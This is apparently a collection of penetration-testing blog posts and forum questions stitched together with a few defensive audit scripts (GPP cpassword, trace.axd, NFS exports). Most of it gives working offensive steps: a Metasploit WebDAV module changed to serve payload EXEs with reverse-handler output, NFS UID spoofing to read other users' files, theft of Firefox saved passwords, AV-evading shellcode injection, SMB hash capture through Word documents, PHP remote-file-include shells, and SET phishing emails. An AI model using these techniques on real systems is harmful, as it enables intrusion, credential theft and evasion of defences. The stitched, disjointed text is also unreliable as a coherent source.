Geo/Social stalking is fun. Bing Maps has the ability to add various "apps" to the map to enhance your Bing Maps experience. One of the cooler ones is the Twitter Map app, which lets you map geotagged tweets.

Let's start with somewhere fun, like the Pentagon, and see who's tweeting around there.

Once you have your places picked out, you can click on the Map Apps tab.

If you click on the Twitter Maps app, it loads recent geo-tagged tweets.

Worth a read if you haven't. Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.

Unfortunately(?) I don't run into this too often. What I do see is the presence of the /.git/ folder; sometimes the config or index files are there, but certainly no way to know what's in the object folders (where the good stuff lives) [or so I thought].

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information by
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'site_wordpress');

I did a talk at the Oct 2012 NovaHackers meeting on exploiting 2008 Group Policy Preferences (GPP) and how they can be used to set local users and passwords via group policy.

I've run into this on a few tests where people are taking advantage of this extremely handy feature to set passwords across the whole domain, and then allowing users or attackers the ability to decrypt these passwords and subsequently 0wning everything :-)

I ended up writing some ruby to do it (the blog post has some python) because the metasploit module was downloading the xml file to loot but taking a poop prior to getting to the decode part. now you can do it yourself:
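As an added example (my own code, not the post's ruby or the metasploit module), here is the defender-side counterpart: a sweep of a SYSVOL copy for the cpassword attribute that GPP writes when a policy sets an account password. It reports where such credentials exist and does not decrypt them; the XML samples are constructed, and the file-name list is an assumption based on which preference types carry that attribute.

```python
"""Find stored credentials in Group Policy Preference XML files."""
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference files that can carry cpassword (assumption: Groups.xml is the
# one the post discusses; the others use the same attribute for service,
# task, data-source, drive and printer credentials). Compared lowercase.
GPP_FILES = {"groups.xml", "services.xml", "scheduledtasks.xml",
             "datasources.xml", "drives.xml", "printers.xml"}

# Attribute that names the account, depending on the element type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed Groups.xml: a policy that (re)sets a local admin's password.
SAMPLE_GROUPS_XML = """
<Groups>
  <User name="LocalAdmin" changed="2012-10-01 12:00:00">
    <Properties action="U" userName="LocalAdmin" newName=""
                cpassword="CONSTRUCTED_CIPHERTEXT_PLACEHOLDER"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
</Groups>
"""

# Constructed Groups.xml that only adds a domain group to local Administrators:
# no password is stored, so it must produce no finding.
SAMPLE_CLEAN_XML = """
<Groups>
  <Group name="Administrators (built-in)">
    <Properties action="U" groupName="Administrators (built-in)">
      <Members><Member name="CORP\\Helpdesk" action="ADD"/></Members>
    </Properties>
  </Group>
</Groups>
"""


def find_cpasswords(xml_text, source="<memory>"):
    """Return one finding dict per Properties element that stores a cpassword."""
    findings = []
    root = ET.fromstring(xml_text)
    for item in root:                        # User, Group, Service, Task, ...
        for props in item.findall("Properties"):
            cpassword = props.get("cpassword")
            if not cpassword:
                continue                     # this element sets no password
            account = next((props.get(a) for a in ACCOUNT_ATTRS
                            if props.get(a)), "?")
            findings.append({
                "file": source,
                "type": item.tag,
                "account": account,
                "action": props.get("action", "?"),   # C/R/U/D
                "changed": item.get("changed", "?"),
                "cipher_len": len(cpassword),        # reported, never decrypted
            })
    return findings


def audit_sysvol(sysvol_root):
    """Walk a SYSVOL copy and collect findings from every preference file."""
    findings = []
    for path in Path(sysvol_root).rglob("*.xml"):
        if path.name.lower() not in GPP_FILES:
            continue
        try:
            text = path.read_text(encoding="utf-8-sig")   # GPP files carry a BOM
            findings.extend(find_cpasswords(text, str(path)))
        except (ET.ParseError, OSError):
            continue                                      # unreadable: skip
    return findings


if __name__ == "__main__":
    for f in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{f['file']}: {f['type']} {f['account']} (action {f['action']}) "
              f"stores a cpassword, changed {f['changed']}")
```

Point audit_sysvol at a copy of \\domain\SYSVOL\domain\Policies; any finding means the policy should be rebuilt without a stored password.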

We've mostly utilized the 3G out-of-band functionality; this allows us to more easily bridge that gap between physical and electronic attack. Either way it's been great and definitely a value add for us.

:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.
:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.
:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:

SSH over any TCP port

SSH over HTTP requests (appears as standard HTTP traffic)

SSH over SSL (appears as HTTPS)

SSH over DNS queries (appears as DNS traffic)

SSH over ICMP (appears as outbound pings)

SSH Egress Buster (top 10 common egress ports)

Out-of-band SSH over 3G/GSM cellular (Elite models)

Yak yak, let's see some action shots!

First some shots of the web interface to set up the various tunnels (taken from the web site)

It's pretty straightforward, and the documentation the Pwnie Express guys provide will get you up and running with whatever tunnel method you choose.

ok now action shots.

Pwn Plug hanging out in an empty cube hooked up to the network

With the 3G stick plugged in. Sorry, kinda blurry, couldn't go back and take another ;-/

Final placement behind some boxes where it hung out for a few days.

The current module does not allow you to download exes; in fact these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated exe) over WebDAV. I know an auxiliary module to be a WebDAV server has been a request for a while, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the exe and then removed .exe from the blacklist.

So if LOCALEXE is set to TRUE then serve up the local exe in the path/filename you specify, if not generate an executable based on the payload options (Yes, I realize AV will essentially make this part useless).

The below is a "show options" with nothing set. The default is to generate an EXE payload; if you want to serve your own local EXE you need to set LOCALEXE to TRUE.

msf exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  txt              yes       The list of extensions to generate
   LOCALEXE    false            yes       Use a local exe instead of generating one based on payload options
   LOCALFILE   myexe.exe        yes       The filename to serve up
   LOCALROOT   /tmp/            yes       The local file path
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH     /                yes       The URI to use (do not change).

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.

Say you need to brute force something. Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at it to quickly. That sux.

I regularly use Intruder to do my brute forcing for me, especially since you can add timing options.

You can intercept your request, send it to Intruder, then add a payload marker for the username (and password if you want to do username/username).

(screenshot: Setting the payload spots)

So if you just want to iterate through a list of usernames with the same pass, you just set the pass, then go to Payloads and add your userlist. Above, I'm doing username and username as the password and using the pitchfork attack type. (I think Ken has gone over this in depth, so I'll stop explaining all that unless people ask for it.)

(screenshot: Our list of usernames)

Once that is set up, you can play with timing options from the Options tab. This will adjust the number of threads and how long to wait in between requests.

(screenshot: Timing options)

You may also want to send everything through Tor. Check the Burp main Options tab.

-CG

"Trace.axd is an Http Handler for .Net that can be used to view the trace details for an application. This file resides in the application’s root directory. A request to this file through a browser displays the trace log of the last n requests in time-order, where n is an integer determined by the value set by requestLimit=”[n]” in the application’s configuration file."http://www.ucertify.com/article/what-is-traceaxd.html

It is a separate file to store tracing messages. If you have pageOutput set to true, your webpage will acquire a large table at the bottom. That will list lots of information: the trace information. trace.axd allows you to see traces on a separate page, which is always named trace.axd.
http://www.dotnetperls.com/trace
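Added example (not from either quoted source): a checker for the system.web/trace element that decides whether trace.axd is reachable by remote clients, how many requests it keeps, and whether pageOutput is on, with a weak web.config beside a hardened one. Both config fragments are constructed; the defaults used for missing attributes (enabled=false, localOnly=true, pageOutput=false, requestLimit=10) are the ASP.NET defaults.

```python
"""Assess trace.axd exposure from an ASP.NET web.config."""
import xml.etree.ElementTree as ET

# Constructed: tracing on, viewable from any client, last 40 requests kept.
WEAK_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <trace enabled="true" requestLimit="40" pageOutput="false"
           localOnly="false" traceMode="SortByTime" />
  </system.web>
</configuration>
"""

# Constructed: tracing off for production. If it must stay on for debugging,
# localOnly="true" restricts trace.axd to requests from the server itself.
HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <trace enabled="false" localOnly="true" />
  </system.web>
</configuration>
"""


def _is_true(element, attr, default):
    """Read a boolean attribute the way the config system does (case-insensitive)."""
    return element.get(attr, default).strip().lower() == "true"


def assess_trace(config_xml):
    """Return a dict describing trace.axd exposure for one web.config."""
    root = ET.fromstring(config_xml)
    # ASP.NET defaults when the element or an attribute is absent.
    result = {"enabled": False, "local_only": True, "page_output": False,
              "request_limit": 10}
    # Only <trace> under <system.web> matters; <system.diagnostics> also has
    # a <trace> element, so do not search the whole tree for the tag.
    for system_web in root.iter("system.web"):
        for trace in system_web.findall("trace"):
            result["enabled"] = _is_true(trace, "enabled", "false")
            result["local_only"] = _is_true(trace, "localOnly", "true")
            result["page_output"] = _is_true(trace, "pageOutput", "false")
            result["request_limit"] = int(trace.get("requestLimit", "10"))
    # trace.axd is a remote information leak only when both conditions hold.
    result["remote_trace_axd"] = result["enabled"] and not result["local_only"]
    return result


def findings(config_xml):
    """Human-readable findings; an empty list means nothing to fix."""
    r = assess_trace(config_xml)
    out = []
    if r["remote_trace_axd"]:
        out.append("trace.axd viewable remotely: details of the last %d requests "
                   "(headers, cookies, form, session and server variables) exposed"
                   % r["request_limit"])
    elif r["enabled"]:
        out.append("tracing enabled (local only); disable before deployment")
    if r["page_output"]:
        out.append("pageOutput=true: trace table appended to every page")
    return out


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_WEB_CONFIG), ("hardened", HARDENED_WEB_CONFIG)):
        print(name, findings(cfg) or ["ok"])
```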

Open NFS mounts/shares are awesome. Talk about sometimes finding "The Goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions, so checking to see what's shared and what you can access is important.

Low? Currently an "info" with Nessus 5.

Anyway, you probably want to know about finding it. You have a few options.

To mount an NFS share use the following after first creating a directory on your local machine:

[root@attacker ~]# mount -t nfs 192.168.0.1:/export/home /tmp/badperms

Change directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1.

To abuse NFS you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm; it talks about tricking NFS to become users. I'm going to put it here in case it goes missing later:

"You ask now, how do you circumvent file permissions and the use of the sticky bit, this is done with a little prior planning and slight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owners UID on the remote system after issuing an ls -al command i.e.

-rwxr----- 517 wheel 898 daves_secret_doc

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the share:
umount /local_dir

Create a user called dave:
useradd dave
passwd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into dave's directory:
cd dave

Issue the command:
su dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff - as the UID for your local account dave matches the username and UID of the remote, the remote system now thinks you're his dave, hey presto you can now do whatever you want with daves_secret_doc."

Valsmith and hdmoore gave their Tactical Exploitation talk at DEF CON 15 and talked about NFS (file services section of the slides): video, white paper. They also gave it at Black Hat in a much longer format; unfortunately the video is broken into multiple 14 minute parts, so go Google for it (lazy).
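Added example, not from the post or the quoted page: an /etc/exports audit that flags the server-side conditions the UID trick above depends on. It parses exports(5) syntax, including the "host (options)" spacing mistake that silently exports to every host, and reports entries that are world-mountable, keep remote root as root (no_root_squash), or trust client-supplied UIDs (no all_squash), which is exactly what lets a local account with uid 517 read daves_secret_doc. The exports file is constructed.

```python
"""Audit /etc/exports for world access, no_root_squash and trusted UIDs."""
import re

# Constructed sample; the last line shows the misplaced-space mistake.
SAMPLE_EXPORTS = """\
# home directories backed up to NFS with bad permissions
/export/home    *(rw,no_root_squash)
/export/backup  192.168.0.0/24(rw,sync,root_squash)
/export/www     10.0.0.5(ro,all_squash,anonuid=65534)
/srv/iso        *.example.com(ro) 10.1.1.1(rw,no_root_squash)
/export/scratch 10.0.0.7 (rw)
"""

# A client token is "host(opt,opt)" or a bare "host". A bare "(opts)" token
# (host omitted, usually because of a stray space) applies to every host.
TOKEN_RE = re.compile(r"([^(]*)(?:\(([^)]*)\))?")


def parse_exports(text):
    """Yield (path, client, options-set) for every export entry in the file."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        path, *clients = line.split()            # entries with no client list are skipped
        for token in clients:
            m = TOKEN_RE.fullmatch(token)
            if not m:
                continue                         # malformed token, e.g. "host("
            host, opts = m.groups()
            options = {o for o in (opts or "").split(",") if o}
            yield path, host or "*", options


def assess(client, options):
    """Return issue codes for one (client, options) pair."""
    issues = []
    if client == "*":
        issues.append("WORLD")                   # any host may mount it
    elif "*" in client or "?" in client:
        issues.append("WILDCARD_HOST")           # e.g. *.example.com
    if "no_root_squash" in options:
        issues.append("NO_ROOT_SQUASH")          # remote uid 0 stays uid 0
    if "all_squash" not in options:
        # Default AUTH_SYS behaviour: the server believes whatever UID the
        # client presents, so a local user created with uid 517 is "dave".
        # root_squash alone only remaps uid 0 and does not prevent this.
        issues.append("UID_TRUSTED")
    if "rw" in options and client == "*":
        issues.append("WORLD_RW")
    return issues


def audit_exports(text):
    """Return [(path, client, [issue codes])] for every entry in the file."""
    return [(path, client, assess(client, opts))
            for path, client, opts in parse_exports(text)]


if __name__ == "__main__":
    for path, client, issues in audit_exports(SAMPLE_EXPORTS):
        print(f"{path:16} {client:18} {', '.join(issues) or 'ok'}")
```

UID_TRUSTED is the normal state of an AUTH_SYS export, so treat it as the reason to restrict the client list (or use all_squash or Kerberos) rather than as a bug in itself.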

Man I love mis-configured WebDAV; I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, it's *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.

LOW?

IIS5 is awesome (not) because WebDAV is enabled by default but the web root is not writable. Wait, who still runs Windows 2000?! I know, I know: app can't be rewritten... accepted risk... blah blah... no one will ever use this to pwn my network... it's ok if that DA admin script logs into it daily....

The "game" is finding the writable directory (if one exists) on the WebDAV enabled server. *Dirbusting and ruby FTW*

I find that it's usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help; Nessus will actually tell you the methods allowed per directory... still a challenge though.

Null sessions are old school. They used to be useful for pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.

Where they can come in useful is

Against mis-configured servers

Against domain controllers to pull info

Low? actually a medium...

More than once I've had a PT where a master_browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute forcing attacks with.

If you like pretty pictures, it kinda looks like this, there are command line utilities as well...

Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master_browsers do allow this, so if you find yourself in the position to be able to speak with one you can get a list of users for the domain.

You can then take that list of users and do brute force attacks against various services. I rarely don't find at least one username/username in an environment.

Sometimes, even though the deployer functionality is password protected, the server-status may not be.

/web-console/status?full=true

/manager/status/all

LOW?

This can be useful to find:

Lists of applications

Recent URLs accessed

sometimes with sessionids

Find hidden services/apps

Enabled servlets

owned stuff :-)

Finding 0wned stuff is always fun, let's see.

Looking at the list of applications, one doesn't look normal (zecmd).

Following that down leads us to zecmd.jsp, which is a jsp shell.

If you are interested in zecmd.jsp and the jboss worm it comes from, this is a good write up, as well as this OWASP preso: https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf

thoughts?

-CG

scriptjunkie recently had a post on Direct shellcode execution in MS Office macros. I didn't see it go into the metasploit trunk, but it's there. How to generate macro code is in the post, but I'll repost it here so I don't have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.

The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.

So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.

We now know that we want to go back and enumerate/dump the column values from dbo.mytable in database MYDATABASE to see if there is anything good there. Most likely there is also a userID or LogonId in there we need to extract as well.

Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up adding the following code to the Office document (replace "[" or "]" with "<" or ">"):

Once that is done go to Insert --> Object --> Text from File --> select your HTML file.

Once that is done, save and open the document. If all is well you'll see the SMB requests to the network share you specified, and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods... I do realize the LM hashes are missing from the smb capture screenie (disabled on Windows 7?) but I was too lazy to install Office on a VM just for the screenshot.

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157
Synopsis : The remote web server contains a document sharing software
Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site
See also : http://www.microsoft.com/Sharepoint/default.mspx

Solution : Make sure the proper access controls are put in place

Risk factor : None

Plugin output : The following instance of SharePoint was detected on the remote host :

You may find yourself needing to do process injection outside of metasploit/meterpreter. Good examples are when you have a java meterpreter shell, or you have access to a GUI environment (Citrix), and/or AV is going all nom nom nom on your metasploit binary. There are two public options I have found: shellcodeexec and syringe.

Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.

shellcodeexec is a small script to execute in memory a sequence of opcodes.

"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."

"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."

"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"

Everyone should check out the slides and the whitepaper, although the slides are better with the case studies and the diagrams. When you check out the slides I encourage you to think about your last pentest and:

1. Could your pentest shop emulate an attacker of the level in the case studies?
2. Did you or they try to scope the test in order to test things like this... aka do a Full Scope test?
3. If you aren't letting your pentesters go after your network like this, how do you think YOUR network will hold up against someone that knows what they are doing?

If you ARE a pentester when was the last time you got the time and scope to do something on the order of these attacks and post exploitation activities from the case studies?

We are getting great at catching our penetration testers (video) but still horrible at catching bad guys. Rather than draining your corporate bank account to have some shop come in and help you clean up your mess after you've discovered someone stealing everything you own... 1. pick a Full Scope shop that can emulate advanced attackers and not just script kiddies with a checkbook, and 2. train like you fight: open the scope for your test, give your testers time to conduct a REAL test, and let your pentesters go after it like a real bad guy would.

Instead of making your testers "test" that same 500 hosts out of 10,000 hosts with no client-sides or user interaction allowed... ask, make, force them to conduct an end-to-end test of the expensive black boxes you have sitting in the rack, your user education, your network segmentation, and your NOC/SOC's ability to test and respond to attacks. Better to find out you suck during your test instead of when someone is stealing everything that makes you money.

In part I agree, you are never going to "win" by keeping an attacker out. Like he puts in the post:

Traditionally we've held the mindset that we "win" if we stop the attackers. This mindset is sheer folly. To "win" in this scenario we need to successfully defend against 100% of attacks, whereas the attacker need only succeed once (probabilistically this works out to being far less than 100%).

Instead, we need to acknowledge the nature of our asymmetric threat and realize that there is no way to achieve "perfect" security and resist 100% of attacks. To think otherwise is willfully ignorant. Instead, we must accept a new status quo based on survivability. That is, despite successful attacks, we can consider ourselves victorious in conflict merely by surviving.

Protecting YOUR important data on the network is ultimately the goal of most network security. Keeping the attackers out is a silly goal. You are one adobe/flash/java/whatever 0day away from failing to keep attackers out and thus "losing".

Surviving a network attack is not the same as surviving a mortar attack on a FOB, where if I'm still breathing and have use of my limbs at the end of it I can call that a "win". In turn, it's not a successful penetration test or attack if you merely "get in" and pop a bunch of shells (see Chris Nickerson's Top 5 Ways To Destroy A Company talk). It's a "win" when I steal what makes that company money, extract it without them knowing, then show it to them later for the "poop in the pants" moment. A report with a bunch of screenies of shells doesn't convey the same sense of "oh shit" that the first 100 entries of their key database does. In this case, while the business may have thought they "survived", they in fact "lost".

We're getting really good at teaching our clients how to catch penetration testers and their methodologies, and conditioning them that this is a "win", when in fact most times defenders fail to see and catch people with a modified methodology, non-public tools, or "non-standard" goals.

I am busy testing a system and Nessus reports that it is possible to exploit it and from the Nessus output it seems like Nessus was successful, see below. However, I cannot find any information anywhere on how to manually produce this vulnerability. Do not confuse it with the horde of other telnet vulnerabilities out there.

I thought it would be as simple as some of the old telnet environment variable vulnerabilities, e.g. telnet -l '-fbin' systemx.com, but it does not seem to work. Any ideas?

Kerberos telnet Crafted Username Remote Authentication Bypass

Synopsis:
It is possible to log into the remote system using telnet without supplying any credentials

Description:
The remote version of kerberos telnet does not sanitize the user-supplied 'USER' environement variable. By supplying a specially malformed USER environment variable, an attacker may force the remote telnet server to believe that the user has already authenticated.

Risk factor:
High

CVSS Base Score:7.6
CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C

Solution:
Apply the patch below or contact your vendor for a patch :

Plugin output:
It was possible to log in and execute "id" : ];root@systemx:~ [root@systemx ~]# uid=

I had read about the following
1)honey-pots(low interaction and high interaction honey-pots)
2)honey-nets(network of honey-pot's)
3)honey-walls!!(combination of honey-pot + firewall +router +gateway)

I had downloaded some low interaction honeypot system and used it, but I didn't know how I can set up honey nets or honey-walls
and their configuration etc..
Did you guys have any experience with honey-nets and honey walls and high interaction honey-pots?
If yes, can anybody tell me where I can learn about them?

And also I heard it is hard for the attackers to detect a honey-wall, because it acts as a multi purpose device, so according to me they can not detect it easily ..

I tried on Google, I ended up with only theory, so decided to ask here...
Hope I will get some ideas here...

Sometimes while you are on a box, when pilfering through all the documents doesn't yield anything useful for you to move laterally, you can grab the Firefox saved passwords. Lots of times someone will save their password to the corporate OWA, wiki, helpdesk page, or whatever. Even if it doesn't give you a *great* lead you'll at least get an idea if they are a password re-user or not.

So how to do it?

Actually it's simple. Inside of the mozilla\firefox directory will be somethingrandom.default. Inside that folder you'll find:

key3.db
signons.sqlite

If there is no master password set, all you have to do is replace the files on your test VM with the two files you downloaded, open firefox, go to preferences, security, and do a view saved passwords.

I think there are some fancy Firefox plug-ins that can pull this info out and I'm sure there are some binaries you can push up that will dump this for you as well. But this is quick and easy and you're probably already downloading files (at least you probably *should* be) anyway...

In the Millennium series by Stieg Larsson, a talented PC user named WASP designs and implements an app named Asphyxia. The interesting part is how the app is constructed on the remote machine by the concatenation of individual payloads. Is this possible in reality? All my knowledge in pentesting is rather limited to standard approaches. Installing a vulnerability is based on the delivery of an intact piece of code that can execute or a single event.

The concept of piecemeal delivery of code that is assembled remotely on the target machine seems to be a devilishly difficult exploit to guard against. How would an antivirus or malware scanning app know about code fragments?

Getting back to the point though-does anyone have insight into this idea?

Metasploit has a nifty PHP Remote File Include module that allows you to get a command shell from a RFI.

Not too complicated to use: set your normal RHOST/RPORT options, set the PATH, and set your PHPURI with the vuln path, putting XXpathXX where you would normally put your php shell. So we take something like Simple Text-File Login Remote File Include that has a vulnerable string of:

Basic options:

   Name        Current Setting                                              Required  Description
   ----        ---------------                                              --------  -----------
   PATH        /                                                            yes       The base directory to prepend to the URL to try
   PHPRFIDB    /home/cg/evil/msf3/dev2/data/exploits/php/rfi-locations.dat  no        A local file containing a list of URLs to try, with XXpathXX replacing the URL
   PHPURI                                                                   no        The URI to request, with the include parameter changed to XXpathXX
   Proxies                                                                  no        Use a proxy chain
   RHOST                                                                    yes       The target address
   RPORT       80                                                           yes       The target port
   SRVHOST     0.0.0.0                                                      yes       The local host to listen on.
   SRVPORT     8080                                                         yes       The local port to listen on.
   SSL         false                                                        no        Negotiate SSL for incoming connections
   SSLVersion  SSL3                                                         no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                                                                  no        The URI to use for this exploit (default is random)
   VHOST                                                                    no        HTTP server virtual host

Payload information:
  Space: 32768

Description:
  This module can be used to exploit any generic PHP file include
  vulnerability, where the application includes code like the
  following:

Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.

If you are using the one bundled with your distro you are probably missing out on some of the more interesting and new features.

From the site:

"LFT, short for Layer Four Traceroute, is a sort of 'traceroute' that often works much faster (than the commonly-used Van Jacobson method) and goes through many configurations of packet-filters (firewalls). More importantly, LFT implements numerous other features including AS number lookups through several reliable sources, loose source routing, netblock name lookups, et al. What makes LFT unique? LFT is the all-in-one traceroute tool because it can launch a variety of different probes using ICMP, UDP, and TCP protocols, or the RFC1393 trace method."

It's been useful for me to locate more systems between me and the target host, as well as identifying gateways/web firewalls that organizations send all (or some) web traffic through.

It's also handy that you can throw it some switches to show the AS and network routes with the scan as well.

I tried to encode it with some crypters but it doesn't work,
so I tried to recompile the source but Avira gets it every time... then I discovered that Avira detects the call listen() in the code of metsvc and then marks it as a backdoor!

Does anyone know of a freely available pcap "attack library" which could be run through TCPreplay? Specifically, I'd like the ability to select either specific individual or multiple-simultaneous attacks and send those attacks down the wire.

I've run some searches but haven't come up with anything yet---thought I would post here before I start building it out myself.

I'm having a problem updating it.
It says "Error: rsync failed. Your NVT collection might be broken now."
Firewall? .. I'm using a domain for downloads, and that's blocking me.. How can I define the proxy in the Konsole, like I had to do on Firefox?

In a pentest scenario we have found an open port for the "3306/tcp open mysql port unauthorized" service.
How can we try to connect to it remotely? What further information can we gain using this information?

Hello all,
I am trying to get remote access to my main computer on my network using the SET email attack.
However when I open the PDF I do not get command line access!
See below:
Thanks in advance for the advice,
yoma

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

There are two options on the mass e-mailer, the first would
be to send an email to one indivdual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

Note: I haven't made 15 posts yet so the pictures can be found in the distorted URLs.

There is no such thing as irrelevant information ~ Muts

During the information gathering stage (if possible) I visit the target for some reconnaissance work in a process that involves exploration and inference. In this case I examined a telecommunications centre which houses a base transceiver station (cell site) and a virtual switchboard. All of this was done with permission. This is a simple overview of my methodology, and the purpose of it is to demonstrate how trifles can turn out to be useful pieces of information.

I usually put on clothes which give me the air of a vagrant, but I don't exaggerate it. I'll wear a cheap rain jacket, torn jeans, a hood, and I'll remove my glasses and mess up my goatee beard. This will avail against prying eyes since I'll just look like a bum rummaging the garbage for recyclable materials and/or food. Why is this important? Because I don't want to produce the impression of a document/identity thief.

Garbage

Even in the days of the paper shredder it's very likely you'll find whole documents, letters and all sorts of memorandums. From this we can collect names of employees and customers, phone numbers, email addresses, material on office routines, schedules and so on and so forth. In addition to useful info I can also deduce recent activities. Let's take a look.

h ttp://i41.tinypic.com/k51nao.jpg

Note the abundance of twisted pair cabling that is on top; could this be just old wires? Or perhaps a change in equipment?

Lying below the bag of wiring on the left side I found a box; on it is the address of a seller and manufacturer of computer equipment, and in addition on the post label there is a content description stating "modular connectors". From this I can deduce that they have indeed been improving their network, and this could be fodder for a social engineering attack.

h ttp://i44.tinypic.com/2rdztjc.jpg

And finally paper, white gold. I always stress my search for crumpled and/or torn notes.
From all this I found the following:
9 Employee names
More assorted names and phone numbers to count. Customers perhaps?
3 work schedules
A paper with the IPs of local hosts scribbled on them, as well as other connection config info.
A document with electronic consumption measurements.
An employment application.
A crumpled post-it-note with a username and password from a web-app of their site.
An internal "staff only" URL

h ttp://i43.tinypic.com/14nzjte.jpg

The Building

I have an eye open for aberrations, I view this as fodder for social engineering attacks. I also peek inside for anything that could be of use.

http://i39.tinypic.com/s4wi9f.jpg

Trouble with your antenna? Here I'm allowed to draw the conclusion that their TV reception is poor. This could be useful fodder for an SE attack: I could ascertain who's behind their TV service and impersonate a service rep stating that he has detected that their television converter box or set-top box is receiving a sub-par signal, and then send them an email containing guidelines on improving their signal. This email could be a vehicle for a backdoor payload, or contain links to sham sites on improving the signal, or maybe even a manual for whatever set-top unit they are using. Remember, being elaborate is a key element.

http://i43.tinypic.com/8zpahg.jpg

It may not be clear in the photo, but they are all running Win XP Pro. Earlier that evening I saw that the monitor at the front was displaying the latest version of Internet Explorer and MSN Messenger.

http://i44.tinypic.com/140ygi1.jpg

Now I know who is providing security.

